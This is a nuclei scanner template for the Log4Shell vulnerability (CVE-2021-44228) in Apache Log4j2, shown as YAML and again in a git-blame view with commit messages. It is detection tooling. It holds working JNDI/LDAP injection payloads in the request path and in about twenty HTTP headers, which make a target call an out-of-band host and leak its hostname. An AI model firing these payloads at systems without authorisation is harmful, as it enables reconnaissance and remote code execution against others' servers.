nuclei-templates/cves/2021/CVE-2021-44228.yaml

id: CVE-2021-44228

info:
  name: Apache Log4j2 Remote Code Injection
  author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
  severity: critical
  description: |
    Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  reference:
    - https://logging.apache.org/log4j/2.x/security.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
  remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-502
  tags: cve,cve2021,rce,oast,log4j,injection,kev

requests:
  - raw:
      - |
        GET /?x=${jndi:ldap://${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
        Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
        Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}}
        Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
        Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
        Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}}
        Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}}
        Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
        Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}}
        Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}}
        Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}}
        Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
        User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}}
        X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}}
        X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}}
        X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}}
        X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
        X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

    extractors:
      - type: kval
        kval:
          - interactsh_ip # Print remote interaction IP in output

      - type: regex
        part: interactsh_request
        group: 2
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

# Enhanced by mp on 2022/02/28
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`id: CVE-2021-44228`

			`info:`
Enhancement: cves/2021/CVE-2021-44228.yaml by mp 2022-02-28 21:43:59 +00:00			`name: Apache Log4j2 Remote Code Injection`
Update CVE-2021-44228.yaml 2021-12-19 09:22:29 +00:00			`author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`severity: critical`
Update CVE-2021-44228.yaml 2022-07-16 17:08:13 +00:00			`description: \|`
			`Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`reference:`
Enhancement: cves/2021/CVE-2021-44228.yaml by mp 2022-02-28 18:48:26 +00:00			`- https://logging.apache.org/log4j/2.x/security.html`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-44228`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q`
			`- https://www.lunasec.io/docs/blog/log4j-zero-day/`
			`- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).`
Auto Generated CVE annotations [Mon Dec 20 14:33:22 UTC 2021] :robot: 2021-12-20 14:33:22 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-score: 10`
Auto Generated CVE annotations [Mon Dec 20 14:33:22 UTC 2021] :robot: 2021-12-20 14:33:22 +00:00			`cve-id: CVE-2021-44228`
			`cwe-id: CWE-502`
Updated "cisa" tags to "kev" + added tags to new applicable templates (#4871) 2022-07-21 17:18:22 +00:00			`tags: cve,cve2021,rce,oast,log4j,injection,kev`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00
			`requests:`
			`- raw:`
			`- \|`
Added Spring Boot Log4j Remote Code Injection (#3993) * Added Spring Boot Log4j Remote Code Injection * minor improvements to CVE-2021-44228 * URI based payload update to catch injection point 2022-03-27 20:16:50 +00:00			`GET /?x=${jndi:ldap://${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`GET / HTTP/1.1`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`Host: {{Hostname}}`
Updated CVE-2021-44228 with most common vulnerable headers (#3334) * Updated with common headers which can be exploited Reference : https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell These headers are collected from above blog in Detecting the Vulnerability part * fix: lint update * Update CVE-2021-44228.yaml * Update CVE-2021-44228.yaml * Updated changed matchers and extractors regex according to v8.7.3 update * payload updates for CVE-2021-44228 - more injection points - a fixed regex to extract uppercase hostnames - standardized payloads - printed injection points Source - https://twitter.com/0xceba/status/1471664540542648322 Co-Authored-By: 0xceba <44234156+0xceba@users.noreply.github.com> Co-Authored-By: Abhiram V <61599526+Anon-Artist@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: 0xceba <44234156+0xceba@users.noreply.github.com> 2021-12-18 05:21:45 +00:00			`Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}`
			`Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}`
			`Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}}`
			`Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}`
			`Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}`
			`Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}}`
			`Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}}`
			`Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}`
			`Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}}`
			`Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}}`
			`Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}}`
			`Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}}`
			`User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}}`
			`X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}}`
			`X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}}`
			`X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}}`
			`X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}`
			`X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00
Added Spring Boot Log4j Remote Code Injection (#3993) * Added Spring Boot Log4j Remote Code Injection * minor improvements to CVE-2021-44228 * URI based payload update to catch injection point 2022-03-27 20:16:50 +00:00			`stop-at-first-match: true`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the DNS Interaction`
			`words:`
			`- "dns"`

			`- type: regex`
			`part: interactsh_request`
			`regex:`
Updated CVE-2021-44228 with most common vulnerable headers (#3334) * Updated with common headers which can be exploited Reference : https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell These headers are collected from above blog in Detecting the Vulnerability part * fix: lint update * Update CVE-2021-44228.yaml * Update CVE-2021-44228.yaml * Updated changed matchers and extractors regex according to v8.7.3 update * payload updates for CVE-2021-44228 - more injection points - a fixed regex to extract uppercase hostnames - standardized payloads - printed injection points Source - https://twitter.com/0xceba/status/1471664540542648322 Co-Authored-By: 0xceba <44234156+0xceba@users.noreply.github.com> Co-Authored-By: Abhiram V <61599526+Anon-Artist@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: 0xceba <44234156+0xceba@users.noreply.github.com> 2021-12-18 05:21:45 +00:00			`- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output`
Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00
			`extractors:`
Update CVE-2021-44228.yaml - Extract DNS interaction IP (#3396) * Update CVE-2021-44228.yaml * lint fix Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-22 12:47:30 +00:00			`- type: kval`
			`kval:`
			`- interactsh_ip # Print remote interaction IP in output`

Updated CVE-2021-44228 with most common vulnerable headers (#3334) * Updated with common headers which can be exploited Reference : https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell These headers are collected from above blog in Detecting the Vulnerability part * fix: lint update * Update CVE-2021-44228.yaml * Update CVE-2021-44228.yaml * Updated changed matchers and extractors regex according to v8.7.3 update * payload updates for CVE-2021-44228 - more injection points - a fixed regex to extract uppercase hostnames - standardized payloads - printed injection points Source - https://twitter.com/0xceba/status/1471664540542648322 Co-Authored-By: 0xceba <44234156+0xceba@users.noreply.github.com> Co-Authored-By: Abhiram V <61599526+Anon-Artist@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: 0xceba <44234156+0xceba@users.noreply.github.com> 2021-12-18 05:21:45 +00:00			`- type: regex`
			`part: interactsh_request`
			`group: 2`
			`regex:`
			`- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output`

Create CVE-2021-44228.yaml (#3319) * Create CVE-2021-44228.yaml * fix: syntax fix * update: added additional path based payload * update: strict matcher + pulling hostname information of the system * update: added path based payload Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-11 19:26:50 +00:00			`- type: regex`
			`part: interactsh_request`
			`group: 1`
			`regex:`
Update CVE-2021-44228.yaml 2021-12-19 09:22:29 +00:00			`- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output`
Enhancement: cves/2021/CVE-2021-44228.yaml by mp 2022-02-28 18:48:26 +00:00
Enhancement: cves/2021/CVE-2021-44228.yaml by mp 2022-02-28 21:43:59 +00:00			`# Enhanced by mp on 2022/02/28`